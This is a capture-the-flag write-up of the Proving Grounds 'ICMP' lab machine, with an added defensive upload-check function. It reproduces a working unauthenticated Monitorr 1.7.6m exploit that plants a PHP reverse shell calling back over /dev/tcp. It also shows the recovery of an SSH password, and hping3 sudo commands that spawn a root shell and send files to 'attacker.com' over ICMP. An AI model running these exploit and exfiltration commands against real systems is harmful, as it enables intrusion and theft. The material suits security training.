# Proving grounds Play: ICMP

Proving grounds Play - ICMP CTF writeup.

### Walkthrough on Youtube

[![youtube](/files/gXgxRyxFqJRz1jPcvdVS)](https://youtu.be/6fyL_fFyV4c)

### NMAP

![img](/files/WT2G4rs6R1bOENnAEgfM)

### PORT 80 Tech Stack

* Operating System: Debian
* Web Technology: Apache, PHP (view-page-source)

### Monitorr

![img](/files/qZEkISjn5IsxIzbWqd7m)

![img](/files/KJmGvUfG7vj8v1FjiyuM)

#### Exploit Code

```python
#!/usr/bin/python
# -*- coding: UTF-8 -*-

# Exploit Title: Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)
# Date: September 12, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
# Software Link: https://github.com/Monitorr/Monitorr
# Version: 1.7.6m
# Tested on: Ubuntu 19

import requests
import os
import sys

if len (sys.argv) != 4:
    print ("specify params in format: python " + sys.argv[0] + " target_url lhost lport")
else:
    url = sys.argv[1] + "/assets/php/upload.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/plain, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------31046105003900160576454225745", "Origin": sys.argv[1], "Connection": "close", "Referer": sys.argv[1]}

    data = "-----------------------------31046105003900160576454225745\r\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"she_ll.php\"\r\nContent-Type: image/gif\r\n\r\nGIF89a213213123<?php shell_exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+sys.argv[2] +"/" + sys.argv[3] + " 0>&1'\");\r\n\r\n-----------------------------31046105003900160576454225745--\r\n"

    requests.post(url, headers=headers, data=data)

    print ("A shell script should be uploaded. Now we try to execute it")
    url = sys.argv[1] + "/assets/data/usrimg/she_ll.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    requests.get(url, headers=headers)
```
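As an added defensive note (not part of the writeup or of the Monitorr project): the exploit above gets a `.php` file stored under the web root because the upload check trusts the leading `GIF89a` bytes. The hypothetical `check_upload()` below shows the check that would have stopped it, requiring the extension, the magic bytes and the file content to agree, and rejecting image data that carries a PHP open tag:

```python
import re
from typing import Optional, Tuple

# Allowlisted image magic bytes and the type each implies (constructed for this example).
IMAGE_MAGIC = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
}
ALLOWED_EXT = {"gif": "gif", "png": "png", "jpg": "jpeg", "jpeg": "jpeg"}
# PHP open tags ("<?php", "<?=", "<? "); any occurrence inside "image" data marks a polyglot.
PHP_TAG = re.compile(rb"<\?(?:php\b|=|\s)", re.IGNORECASE)

def image_type(data: bytes) -> Optional[str]:
    """Return the image type implied by the leading magic bytes, or None."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None

def check_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Decide whether an upload may be stored; returns (accepted, reason).
    Hypothetical handler: extension, magic bytes and content must all agree."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:          # rejects she_ll.php outright, whatever it starts with
        return False, f"extension .{ext} not allowed"
    kind = image_type(data)
    if kind is None:
        return False, "no recognised image magic bytes"
    if ALLOWED_EXT[ext] != kind:        # e.g. GIF bytes uploaded under a .png name
        return False, f"extension .{ext} does not match content type {kind}"
    if PHP_TAG.search(data):            # "GIF89a<?php ..." is still PHP to the interpreter
        return False, "PHP open tag embedded in image data"
    return True, "ok"
```

Storing accepted files outside the web root, or serving the upload directory with PHP execution disabled, keeps a bypass of this check from becoming code execution.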

#### Obtaining Reverse Shell

![img](/files/mI2psR3EpXLysF7zwB0j)

**Obtained local flag**

![img](/files/WClKhrcAdIBy9E9MQjdN)

## Privilege Escalation

#### Obtain user

Access to the `devel` folder is denied because the current user is not a system user. The reminder file shown below, however, contains a tip.

![img](/files/gdbh4Yz74iSlF764hvqN)

The PHP file `crypt.php` inside the `devel` folder discloses the SSH password for the user `fox`.

```php
<?php
echo crypt('BUHNIJMONIBUVCYTTYVGBUHJNI','da');
?>
```

**User access obtained.**

![img](/files/kDm76YkGteR1zqsusKE8)

### Root Privilege Escalation

Check the current user sudo permissions.

![img](/files/nJM3UpkqeSlwzq9NWmWa)

Search GTFOBins for an `hping3` entry.

#### Sudo

If the binary is allowed to run as superuser by `sudo`, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

```sh
sudo hping3
/bin/sh
```

The file is sent continuously; adjust the `--count` parameter or kill the sender when done. Receive on the attacker box with:

```sh
sudo hping3 --icmp --listen xxx --dump
```

```sh
RHOST=attacker.com
LFILE=file_to_read
sudo hping3 "$RHOST" --icmp --data 500 --sign xxx --file "$LFILE"
```

### Transferring SSH key locally to obtain root access through hping3

#### ICMP Listener

![img](/files/OLoPPQ3fyUeRPtoUpuTS)

#### ICMP: Data Send

![img](/files/cTZBFIU3Lml8ax5WoOnR)

#### ICMP: Data Receive

![img](/files/dVIGHaRPVjU9BwEo3KBt)

### SSH Root User

SSH to the root user using the obtained root SSH key.

![img](/files/tYAu6qqZfW5ZfiAFLHsH)

**Root user access and proof.txt obtained**

![img](/files/ql2DjBLN49MaZpo5UOeS)

Thanks for reading!

For more updates and insights, follow me on Twitter: [@thevillagehacker](https://twitter.com/thevillagehackr).


